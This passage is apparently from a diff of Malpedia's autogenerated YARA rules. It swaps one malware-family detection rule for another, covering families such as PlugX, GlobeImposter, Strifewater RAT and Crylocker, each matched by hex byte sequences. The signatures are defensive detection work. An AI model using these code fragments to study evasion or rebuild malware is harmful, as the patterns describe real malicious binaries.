"https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jessiecontea_auto.yar#L1-L165" license_url = "N/A" - logic_hash = "98d11ad376be93c301b2c1f8309ca9e93b58254eeadefcb865a1a57e18934a28" + logic_hash = "c68c31b644ea8b3e7ca9f4e4366853343f61b6640765616026487f548092899b" score = 75 quality = 75 tags = "FILE" @@ -184556,32 +187328,38 @@ rule MALPEDIA_Win_Sysget_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 56 6a20 8d45cc 50 53 53 } - $sequence_1 = { f3a5 33f6 8d4435f0 8a08 f6d1 80f15f } - $sequence_2 = { 58 6a00 ff15???????? 6a01 8d85ecf9ffff 50 8d85ecf1ffff } - $sequence_3 = { 8985c8f9ffff 83c032 50 66a5 e8???????? 83c428 } - $sequence_4 = { 33f6 8d4435f0 8a08 f6d1 80f15f 46 } - $sequence_5 = { 75f5 8dbdecfeffff 2bc2 83ef02 668b4f02 83c702 6685c9 } - $sequence_6 = { 83c424 6800010000 ffb5f8feffff c1e306 8d841dfcfeffff 50 ff15???????? } - $sequence_7 = { 6a50 68???????? 50 ff15???????? a3???????? a1???????? } - $sequence_8 = { 51 ff36 897d0c 50 53 } - $sequence_9 = { 8d459c 50 56 56 6a20 53 } + $sequence_0 = { c78590f4ffff00000000 c7858cf4ffff00000000 c78588f4ffff00000000 c78594f4ffff01000000 c78598f4ffff01000000 e8???????? } + $sequence_1 = { 3d00010000 0f8f03010000 6a00 6a00 50 } + $sequence_2 = { 8d85e8fdffff 50 8d85a2f6ffff 50 } + $sequence_3 = { 57 8b7d18 8945c0 8b4510 } + $sequence_4 = { eb02 2bf7 6a00 8d85e8b7ffff 50 } + $sequence_5 = { 5d c3 c705????????31090000 5f 5e 5b 8be5 } + $sequence_6 = { 56 57 680a020000 8d85d8fbffff 8bf2 6a00 } + $sequence_7 = { 6880000000 6a01 6a00 6a01 6800000040 8d85f8fbffff 50 } + $sequence_8 = { 41b800080000 be20000008 e8???????? 33d2 448975c0 } + $sequence_9 = { 4d8bc8 4d2bcd 6690 488d82fafeff7f } + $sequence_10 = { 83e03f 2bc8 33c0 48d3c8 488d0d39d20100 4833c2 } + $sequence_11 = { 7305 44887c3710 488bcb e8???????? 397d50 7230 } + $sequence_12 = { ff15???????? 85c0 0f8580fcffff 488b4c2460 } + $sequence_13 = { 892d???????? 8b1d???????? 488d4c2430 8bfd 48896c2430 } + $sequence_14 = { 4889442440 33d2 4489742448 41b8ff3f0000 488d8d51070000 } + $sequence_15 = { 488b4d98 488d4588 4889442428 41b902000000 } condition: - 7 of them and filesize <352256 + 7 of them and filesize <413696 } -rule MALPEDIA_Win_Webc2_Greencat_Auto : FILE +rule MALPEDIA_Win_Smac_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "60cc7c89-f223-5f05-b50e-ef8d73401362" + id = "b9e948cf-fc1c-55b5-a40e-593d0b67f4eb" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_greencat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_greencat_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.smac_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "e9fd4938930988d9b35f1bca39290f31fad2f360914fa390eec34fabf9934b56" + logic_hash = "69ecbaffb88ef2eb7b0bb4fc54b666c372bcfee7df6d63633067f160f5f10295" score = 75 quality = 75 tags = "FILE" @@ -184595,32 +187373,32 @@ rule MALPEDIA_Win_Webc2_Greencat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 57 50 e8???????? 59 8bd8 59 eb03 } - $sequence_1 = { 59 59 e9???????? ff35???????? ff15???????? 3bc6 } - $sequence_2 = { 33f6 895df4 8d450c 50 ff35???????? ff15???????? 817d0c03010000 } - $sequence_3 = { 395ddc 752d 391d???????? 7525 3bf3 7521 } - $sequence_4 = { e8???????? 83c418 53 6a02 } - $sequence_5 = { 8d85fcfeffff 33ff 6804010000 50 } - $sequence_6 = { 50 53 ff15???????? 33c9 8945f0 } - $sequence_7 = { 8bf0 395ddc 752d 391d???????? 7525 3bf3 7521 } - $sequence_8 = { ff75fc ff15???????? 83c428 53 6880000000 } - $sequence_9 = { 0fbe4007 83e830 8945f8 8d85f8fdffff 50 } + $sequence_0 = { 66898548ffffff 8bc3 6689854affffff 58 6a74 6689854cffffff 58 } + $sequence_1 = { 39bd78feffff 0f86b8000000 ffb578feffff e8???????? ffb578feffff 8bf0 57 } + $sequence_2 = { 668945ec 668975ea 8d8598feffff 8bf4 89a578feffff 50 } + $sequence_3 = { 8d9d44ffffff e8???????? 6a01 33ff 8bf3 e8???????? 8b1d???????? } + $sequence_4 = { e8???????? 83ec1c c68424900100000e 8d842484000000 8bf4 8964245c } + $sequence_5 = { 8945f0 3bc3 7514 6a01 33ff 8d7508 e8???????? } + $sequence_6 = { 83c42c 33f6 46 5b ffb5f480ffff ff15???????? } + $sequence_7 = { 8986d8000000 ffd7 8986dc000000 8bc6 e8???????? c20800 6a00 } + $sequence_8 = { 8bf4 89a578feffff 50 e8???????? 83ec1c c645fc04 8d4528 } + $sequence_9 = { 66899d42ffffff 5b 6a74 66899d44ffffff 5b } condition: - 7 of them and filesize <57344 + 7 of them and filesize <212992 } -rule MALPEDIA_Win_Nokoyawa_Auto : FILE +rule MALPEDIA_Win_Strifewater_Rat_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "71f47de5-b877-5435-a43f-09577ab6e252" + id = "a7c325df-e174-5ac3-901f-1a7ff4cd21d1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokoyawa" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.nokoyawa_auto.yar#L1-L121" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strifewater_rat" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.strifewater_rat_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "a3e5835d9868e848c4cf7b1e58144cc15b3f0d5c2b0274b447bdec70231f3ad8" + logic_hash = "d8e033b18ffd1945f4234d82e35ef039ad0fd09fec88b912a93b43fc77397cc7" score = 75 quality = 75 tags = "FILE" @@ -184634,32 +187412,32 @@ rule MALPEDIA_Win_Nokoyawa_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33c8 8bc1 8b4c2420 488b9424c0000000 88040a e9???????? 33c0 } - $sequence_1 = { 488b4c2460 e8???????? 488b442468 4883e0c0 } - $sequence_2 = { 890424 8b0424 83c003 99 83e203 03c2 c1f802 } - $sequence_3 = { 488b4c2448 488b0c01 e8???????? 85c0 7511 c605????????01 e8???????? } - $sequence_4 = { 89442434 e8???????? 488905???????? 8b442434 } - $sequence_5 = { 48894c2408 4883ec18 48c7042400000000 488b442420 488b0c24 0fb70448 } - $sequence_6 = { 8b442420 83c014 89442420 837c242040 } - $sequence_7 = { 880424 488b442410 48c1e005 4803442410 0fb60c24 4803c1 4889442410 } - $sequence_8 = { 486bc907 8b4c0c20 8b440420 33c1 b904000000 } - $sequence_9 = { 8b9424a0000000 03d1 8bca 8d8408a1ebd96e 8b4c2414 03c8 } + $sequence_0 = { 83630800 488d0d10400500 48890b c6434400 448ac6 488bd0 } + $sequence_1 = { 4183c9ff 4d8bc7 66448926 4889742420 8d4a03 ff15???????? f7d8 } + $sequence_2 = { 663b3d???????? 0f8559010000 663b1d???????? 0f854c010000 66443b35???????? 0f853e010000 } + $sequence_3 = { 488d05bb720600 488bf9 488901 8bda 488b4910 e8???????? 488b4f18 } + $sequence_4 = { 4803c0 480101 4803db eb22 498b06 498bce } + $sequence_5 = { 488bf8 48898424c0000000 488b4e08 4885c9 7509 488d15fc350900 eb0d } + $sequence_6 = { 0903 e9???????? 488d05d8940500 0f100f 0f1006 f30f7f4dd0 f30f7f45e0 } + $sequence_7 = { 418d45ff 410fb68c8332b30800 410fb6b48333b30800 8bd9 } + $sequence_8 = { 498b4e08 4c8d4508 33d2 ff15???????? 488b7508 4c8d4530 488bce } + $sequence_9 = { 884dd8 488bd3 482bd7 48d1fa 4883fa0f 7426 41b001 } condition: - 7 of them and filesize <92160 + 7 of them and filesize <1552384 } -rule MALPEDIA_Win_Dadstache_Auto : FILE +rule MALPEDIA_Win_Final1Stspy_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1b258f10-8f88-5091-9d8a-b7cbb1e4a0e5" + id = "7c2b072b-c27f-54e3-a7df-2dc853163db8" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dadstache" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dadstache_auto.yar#L1-L168" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.final1stspy" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.final1stspy_auto.yar#L1-L115" license_url = "N/A" - logic_hash = "77711feda2c16f34186a4f1ae2717975593af55ed7e01d177132f4e333f94d90" + logic_hash = "654817f55704ecafec1c10904f1a6a25212804a4fb3c152f1d4aecbab6ecef0c" score = 75 quality = 75 tags = "FILE" @@ -184673,40 +187451,34 @@ rule MALPEDIA_Win_Dadstache_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d442414 50 6a1f ff35???????? } - $sequence_1 = { 8b470c 8bf9 31460c 0f1006 c7450c09000000 0f1145e8 } - $sequence_2 = { 85c0 7550 8b0d???????? 8b35???????? 85c9 7403 } - $sequence_3 = { 53 8d4d08 895d08 51 53 50 53 } - $sequence_4 = { 837c242c10 8d442418 51 0f4344241c } - $sequence_5 = { 8d5201 8842ff 83e901 75f2 8bd3 c1ea04 } - $sequence_6 = { 6aff 6a00 8d442438 c74424340f000000 50 } - $sequence_7 = { 6a1f ff35???????? ff15???????? a1???????? } - $sequence_8 = { 741b 8b45f0 47 83c628 3bf8 } - $sequence_9 = { 7405 8b4718 8901 8b731c 57 } - $sequence_10 = { 42 83c628 8955f0 3b55e4 0f8c66ffffff } - $sequence_11 = { 7325 8b7c240c 4a 03d7 8d4fff } - $sequence_12 = { 8b4485b0 85d2 8b56f8 7405 0d00020000 8d5de4 53 } - $sequence_13 = { e8???????? 85c0 741d 8bce e8???????? 8bce } - $sequence_14 = { c3 8b4e04 8d4604 8945fc 8b06 } - $sequence_15 = { 84c9 740e 3aca 74ef 0fb6c2 0fb6c9 } + $sequence_0 = { 03d0 8b45fc 8a4803 c1e206 80f93d 7508 } + $sequence_1 = { 51 56 8d55fc c745fc00000000 e8???????? 8bf0 } + $sequence_2 = { 8a1d???????? 8b4dfc 83c104 894dfc } + $sequence_3 = { eb2e 85ff 7594 b8???????? 6690 3ad9 } + $sequence_4 = { 81e7ff070080 7908 4f 81cf00f8ffff } + $sequence_5 = { 0f114c0f10 83c120 3bca 7cd4 3bce } + $sequence_6 = { 84db 7410 8a11 8acb 3aca 7425 8a4801 } + $sequence_7 = { 81cf00f8ffff 47 33f6 85ff 7e0a } + $sequence_8 = { 8945fc 57 8d7e01 8a06 } + $sequence_9 = { 7410 8a11 8acb 3aca } condition: - 7 of them and filesize <580608 + 7 of them and filesize <557056 } -rule MALPEDIA_Win_Sepulcher_Auto : FILE +rule MALPEDIA_Win_Fancyfilter_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "666ccc80-c712-59f8-bf12-61bac5486b32" + id = "80aed11c-235c-5a1c-926a-79da2aeef3b0" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sepulcher_auto.yar#L1-L124" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fancyfilter_auto.yar#L1-L112" license_url = "N/A" - logic_hash = "fea20fdb29a4a6cc26bf9baf225a8110e30f06d577e665b386797a74632bb5da" + logic_hash = "3c31ea55e7982b34390b9c81f5913450958243c449d75663ce6d5f15ca3bbd38" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -184718,34 +187490,34 @@ rule MALPEDIA_Win_Sepulcher_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 56 57 6a43 8bf9 58 6a4d 8db784480000 } - $sequence_1 = { 7515 6a04 8d45bc 50 e8???????? 8b4db8 8bd0 } - $sequence_2 = { 58 6a74 59 6a53 668945ea 58 } - $sequence_3 = { 0fb71408 8bc2 c1e002 66393408 75f1 } - $sequence_4 = { eb1a 8d45fc 50 8b04bd50de0110 ff743018 } - $sequence_5 = { 668945d2 b8???????? 66894db4 66894dba 66894dc0 } - $sequence_6 = { 56 57 6a5a 58 6a52 } - $sequence_7 = { c1f906 6bd030 8b45fc 03148d50de0110 8b00 894218 } - $sequence_8 = { 8bd8 895db0 8d0c4dffff0000 51 57 53 e8???????? } - $sequence_9 = { 58 6a33 668945e8 668945ea 58 6a32 668945ec } + $sequence_0 = { 740a 66833800 7404 b001 eb02 } + $sequence_1 = { a1???????? 83c012 50 ff15???????? } + $sequence_2 = { 8b07 83e810 50 83c610 56 } + $sequence_3 = { ff15???????? 83c420 83f803 7409 83f806 } + $sequence_4 = { 83c012 50 ffd6 a1???????? } + $sequence_5 = { 85c0 750d 8b472c a801 7406 83c804 } + $sequence_6 = { 85c0 740a 66833800 7404 b001 eb02 } + $sequence_7 = { 81e3ffffff00 ff15???????? 50 ff15???????? } + $sequence_8 = { 85c0 740a 66833800 7404 b001 } + $sequence_9 = { b805400080 c20400 56 8b742408 } condition: - 7 of them and filesize <279552 + 7 of them and filesize <169984 } -rule MALPEDIA_Win_Plugx_Auto : FILE +rule MALPEDIA_Win_Globeimposter_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f3050f8b-cffb-5dba-854a-dbf0ccdc7dc1" + id = "4d7b48e1-c009-5b34-a438-f100a6a58894" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.plugx_auto.yar#L1-L275" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.globeimposter_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "dee163361f083ebb03bd1347d736d4fc9d87c0c2c6fd15ac5989d8dd6f5a5f80" + logic_hash = "608bf851e6cd1f78be1de6e26308954d73fd642b69ffa80c802e22a056e6ef77" score = 75 - quality = 73 + quality = 75 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -184757,55 +187529,34 @@ rule MALPEDIA_Win_Plugx_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 51 56 57 6a1c 8bf8 } - $sequence_1 = { 33d2 f7f3 33d2 8945fc } - $sequence_2 = { 55 8bec a1???????? 83ec5c 53 } - $sequence_3 = { 55 8bec 51 0fb74612 } - $sequence_4 = { 51 53 6a00 6a00 6a02 ffd0 85c0 } - $sequence_5 = { 41 3bca 7ce0 3bca } - $sequence_6 = { 56 8b750c 8b4604 050070ffff } - $sequence_7 = { 6a00 6800100000 6800100000 68ff000000 6a00 6803000040 } - $sequence_8 = { e8???????? 3de5030000 7407 e8???????? } - $sequence_9 = { e8???????? 85c0 7508 e8???????? 8945fc } - $sequence_10 = { 50 ff15???????? a3???????? 8b4d18 } - $sequence_11 = { 85c0 7413 e8???????? 3de5030000 } - $sequence_12 = { e8???????? 85c0 7407 b84f050000 } - $sequence_13 = { e8???????? 85c0 750a e8???????? 8945fc } - $sequence_14 = { 6a00 6a04 6a00 6a01 6800000040 57 } - $sequence_15 = { 6a00 6819000200 6a00 6a00 6a00 51 } - $sequence_16 = { 56 56 6a01 56 ffd0 } - $sequence_17 = { 85c0 750d e8???????? 8945f4 } - $sequence_18 = { 57 e8???????? eb0c e8???????? } - $sequence_19 = { 50 ff75e8 6802000080 e8???????? } - $sequence_20 = { 6a00 ff7028 e8???????? 83c408 85c0 } - $sequence_21 = { 6808020000 6a00 ff742450 e8???????? 83c40c } - $sequence_22 = { 6a02 6a00 e8???????? c705????????00000000 } - $sequence_23 = { 6800080000 68???????? e8???????? 6800080000 68???????? e8???????? } - $sequence_24 = { 5e 5f 5b 5d c3 64a118000000 } - $sequence_25 = { 81ec90010000 e8???????? e8???????? e8???????? } - $sequence_26 = { 68???????? 6830750000 68e8030000 ff36 } - $sequence_27 = { 5f 5b 5d c20400 55 53 57 } - $sequence_28 = { 50 56 ffb42480000000 ff15???????? } - $sequence_29 = { 6808020000 6a00 ff74242c e8???????? } - $sequence_30 = { 6a01 6a00 e8???????? a3???????? 6800080000 } + $sequence_0 = { c1e810 8bca c1e908 23c7 23cf } + $sequence_1 = { 6a0c 5f eb0d 3d96000000 1bff } + $sequence_2 = { 8b4508 8b4e08 89442418 85ff 7452 } + $sequence_3 = { 0fd4cd 0f6e6f10 0fd4d5 0f7e4f08 0f73d120 0fd4cf 0f6e6f14 } + $sequence_4 = { 6a02 57 57 6800000040 8d85fcefffff } + $sequence_5 = { 0fd4cb 0f6e16 0ff4d0 0f6e6604 } + $sequence_6 = { 83c0fc 3918 7506 83e804 4f 75f6 } + $sequence_7 = { 83c104 f7db 75d7 5f 5b } + $sequence_8 = { 8bf0 8b06 8d7604 0119 3919 } + $sequence_9 = { 8bc7 f7f6 33d2 0fafc6 2bf8 } condition: - 7 of them and filesize <1284096 + 7 of them and filesize <327680 } -rule MALPEDIA_Win_Hamweq_Auto : FILE +rule MALPEDIA_Win_Yty_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5d79f276-5807-56d4-9ea0-44042b180646" + id = "02d4730a-30ed-52fc-baae-eabe1247d262" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hamweq_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.yty_auto.yar#L1-L501" license_url = "N/A" - logic_hash = "f4464ade23ea171530cd0c6e2b15abfaf45c0eb2379ccacb80bd385a306f9a8e" + logic_hash = "379d5918b4988ca6f478472e8b6e04b973c7dd65b7661d4073d168551cfe004f" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -184817,32 +187568,77 @@ rule MALPEDIA_Win_Hamweq_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 53 51 8b4e08 8945f8 ffb148010000 ff5044 } - $sequence_1 = { 8d85e4f1ffff 50 ff5744 50 } - $sequence_2 = { 837c910800 8d449108 894514 0f8438010000 837c910c00 } - $sequence_3 = { 668b4804 51 ff30 56 e8???????? 83c40c } - $sequence_4 = { 51 ff5040 8b0e 8d85ecfeffff 53 50 } - $sequence_5 = { 7504 6afe ebea 8b4e08 8b06 ff7170 } - $sequence_6 = { 8d4580 8b0b 50 ff5154 } - $sequence_7 = { 8b06 753c ffb1d8000000 8d8d00feffff 51 } - $sequence_8 = { 51 8d4d80 51 ff5054 eb12 8b5d08 } - $sequence_9 = { c3 8b442408 8a08 84c9 7408 } + $sequence_0 = { 0f840c000000 8365d8fe 8b7508 e9???????? } + $sequence_1 = { 8d45f4 64a300000000 8b7508 33ff 897dd8 } + $sequence_2 = { 8975e0 85c9 7407 8b11 8b4204 ffd0 c745fc00000000 } + $sequence_3 = { 668910 8bc6 5b 8be5 5d c20400 } + $sequence_4 = { ffd2 8b8568ffffff 8b08 8b5108 50 } + $sequence_5 = { eb69 8a1402 2ad1 8bfe 80ea13 } + $sequence_6 = { 6a00 8d4508 c746140f000000 c7461000000000 } + $sequence_7 = { 750c 680e000780 e8???????? 33ff c745fcffffffff } + $sequence_8 = { 80ea04 b904000000 eb23 8b5508 397d1c 7303 } + $sequence_9 = { 85c0 52 0f95c3 ffd6 } + $sequence_10 = { 2ad1 8bfe 80ea04 b901000000 e9???????? } + $sequence_11 = { 40 3b4610 0f82dbfeffff 397d1c } + $sequence_12 = { 83c40c 8d8de8fdffff 51 53 53 } + $sequence_13 = { 8b4e10 397e14 7211 8a1402 8b3e } + $sequence_14 = { 894608 8945fc 56 c745f001000000 } + $sequence_15 = { 8bcf e8???????? 8b0e 8b5104 8b443238 } + $sequence_16 = { 53 50 e8???????? 83c40c 8d8de8fdffff } + $sequence_17 = { 7303 8d5508 8b4e10 397e14 7214 } + $sequence_18 = { 8bfe 8a1402 2ad1 80ea13 33c9 881407 } + $sequence_19 = { 8b4c3138 33db 895de8 885def 8975e0 } + $sequence_20 = { 807def00 8b5de8 7503 83cb02 8b16 8b4a04 } + $sequence_21 = { c0ea02 8ac4 80e20f c0e004 } + $sequence_22 = { 8b07 eb02 8bc7 8b4de0 } + $sequence_23 = { 8b4c1938 895dd4 85c9 7405 8b01 ff5004 c745fc00000000 } + $sequence_24 = { 8b85c4f5ffff 50 e8???????? 83c404 8d95c0f5ffff 33c9 52 } + $sequence_25 = { 8bcc 8975f4 50 e8???????? ff7510 8d4dd4 } + $sequence_26 = { 762a 8b4d08 8b5108 8a8210a04600 2c01 8845ff 8b4d08 } + $sequence_27 = { 68???????? ff15???????? 3bf4 e8???????? 8bf4 8b4594 50 } + $sequence_28 = { b9???????? e8???????? 51 8d8d90bcf0ff } + $sequence_29 = { 6bf630 8b0c8d60cb4300 80643128fd 5f } + $sequence_30 = { 8bec 8b4508 8bc8 83e01f c1f905 8b0c8da0244300 } + $sequence_31 = { 83e61f 8d3c8da0244300 8b0f c1e606 833c0eff 7535 833d????????01 } + $sequence_32 = { c745e401000000 e9???????? c745e000000000 8b15???????? a1???????? 01d0 } + $sequence_33 = { ff15???????? 85c0 0f85e3020000 68???????? 50 50 ff15???????? } + $sequence_34 = { 8b4804 8d4190 89840df0b8f0ff 8d8d04b9f0ff e8???????? 8b85f4b8f0ff 8b4004 } + $sequence_35 = { 0f851f040000 8d853cfeffff 83c01c 890424 } + $sequence_36 = { 8b4d0c 83e13f 6bd130 8b048500b04600 } + $sequence_37 = { 3bf4 e8???????? 8bf4 8b8574fcffff 50 ff15???????? 3bf4 } + $sequence_38 = { 01ca 0fb612 89d1 8b550c 01ca 8810 } + $sequence_39 = { 740c c785d4ddffffac084500 eb0a c785d4ddffffd4d44400 8b85a4ddffff 50 } + $sequence_40 = { 8b4508 890424 e8???????? 8945d8 837dd800 0f847a050000 } + $sequence_41 = { e8???????? c78562feffff00000000 8d8566feffff b960000000 bb00000000 } + $sequence_42 = { 8d8da8efffff e8???????? 50 8d8dd0efffff e8???????? 8d8da8efffff e9???????? } + $sequence_43 = { e8???????? 83ec0c 8d8ddcfbffff 0f1000 0f1105???????? f30f7e4010 } + $sequence_44 = { f3ab c745f800000000 c745d400000000 8b450c } + $sequence_45 = { e8???????? c78324020000ffffffff c78328020000ffffffff 83c414 5b } + $sequence_46 = { 56 53 83ec14 8b5c2420 e8???????? 85db c70000000000 } + $sequence_47 = { e9???????? 8975e4 33c0 39b880f94200 } + $sequence_48 = { 750c c785bcddffff60084500 eb0a c785bcddffffd4d44400 b802000000 } + $sequence_49 = { 83e63f c1ff06 6bf630 8b04bd60cb4300 f644302880 741f e8???????? } + $sequence_50 = { 8d15f0224100 e8???????? 58 5a } + $sequence_51 = { 83e826 89c2 a1???????? c744240800000000 89542404 890424 e8???????? } + $sequence_52 = { 0f87b1030000 ff24bd41574200 8b41e4 3b42e4 7478 0fb642e4 0fb671e4 } + $sequence_53 = { 57 897de8 ff15???????? 8bd0 8955ec c645fc01 c746140f000000 } + $sequence_54 = { c745dc03000000 eb7c c745e088044300 ebbb d9e8 } condition: - 7 of them and filesize <24576 + 7 of them and filesize <1097728 } -rule MALPEDIA_Win_Strifewater_Rat_Auto : FILE +rule MALPEDIA_Win_Unidentified_020_Cia_Vault7_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a7c325df-e174-5ac3-901f-1a7ff4cd21d1" + id = "229fefe8-12a2-5321-841b-a1c5858ad20f" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strifewater_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.strifewater_rat_auto.yar#L1-L128" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.unidentified_020_cia_vault7_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "d8e033b18ffd1945f4234d82e35ef039ad0fd09fec88b912a93b43fc77397cc7" + logic_hash = "121c8e165e7a80ef0b3dea83e1137d20669defc5a0d83275fbb5b7562347ae72" score = 75 quality = 75 tags = "FILE" @@ -184856,32 +187652,32 @@ rule MALPEDIA_Win_Strifewater_Rat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83630800 488d0d10400500 48890b c6434400 448ac6 488bd0 } - $sequence_1 = { 4183c9ff 4d8bc7 66448926 4889742420 8d4a03 ff15???????? f7d8 } - $sequence_2 = { 663b3d???????? 0f8559010000 663b1d???????? 0f854c010000 66443b35???????? 0f853e010000 } - $sequence_3 = { 488d05bb720600 488bf9 488901 8bda 488b4910 e8???????? 488b4f18 } - $sequence_4 = { 4803c0 480101 4803db eb22 498b06 498bce } - $sequence_5 = { 488bf8 48898424c0000000 488b4e08 4885c9 7509 488d15fc350900 eb0d } - $sequence_6 = { 0903 e9???????? 488d05d8940500 0f100f 0f1006 f30f7f4dd0 f30f7f45e0 } - $sequence_7 = { 418d45ff 410fb68c8332b30800 410fb6b48333b30800 8bd9 } - $sequence_8 = { 498b4e08 4c8d4508 33d2 ff15???????? 488b7508 4c8d4530 488bce } - $sequence_9 = { 884dd8 488bd3 482bd7 48d1fa 4883fa0f 7426 41b001 } + $sequence_0 = { 6a08 6a01 52 ff15???????? 85c0 0f859f000000 8b45d0 } + $sequence_1 = { 57 ff15???????? 8bf0 85f6 0f8470ffffff 8b85ecfdffff } + $sequence_2 = { 6a00 6a00 6a00 6a00 8d95f4fdffff 52 6a01 } + $sequence_3 = { 8bc1 c1f805 8bf1 83e61f 8d3c8520834100 8b07 } + $sequence_4 = { 0f870d0a0000 ff2485bbce4000 33c0 838df4fbffffff 898598fbffff 8985b0fbffff } + $sequence_5 = { 33d2 6806020000 52 8d85eafbffff 50 668995e8fbffff e8???????? } + $sequence_6 = { 5d c3 b984120000 b8???????? } + $sequence_7 = { 8d45f4 50 52 51 57 ff15???????? 8b4d08 } + $sequence_8 = { 50 51 ff15???????? 85c0 7420 8b55fc } + $sequence_9 = { 83ffff 7410 8d4c2420 51 } condition: - 7 of them and filesize <1552384 + 7 of them and filesize <253952 } -rule MALPEDIA_Win_Mocton_Auto : FILE +rule MALPEDIA_Win_Crylocker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "72b425f0-e1bd-580c-ba97-36f1bcb1157c" + id = "4bfc7917-6752-5365-845d-244ec08bbbad" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.mocton_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.crylocker_auto.yar#L1-L128" license_url = "N/A" - logic_hash = "f466c26ab0d8cd5071e2b5a32b6cc128a028215985bbf34b30810ffd494c9c82" + logic_hash = "846ce0f815360303954c01156a8157bafbdde3bd263a1bdd7a06f8c9923993ce" score = 75 quality = 75 tags = "FILE" @@ -184895,32 +187691,32 @@ rule MALPEDIA_Win_Mocton_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b4db8 81e1dbb036e4 33c8 334db8 8b55b8 83c201 8955b8 } - $sequence_1 = { 0b55d0 8b45d0 83e801 8945d0 85d2 741e 8b4dd0 } - $sequence_2 = { 898584feffff e9???????? 8b8d9cfeffff 83e901 898d9cfeffff 8b959cfeffff 8b859cfeffff } - $sequence_3 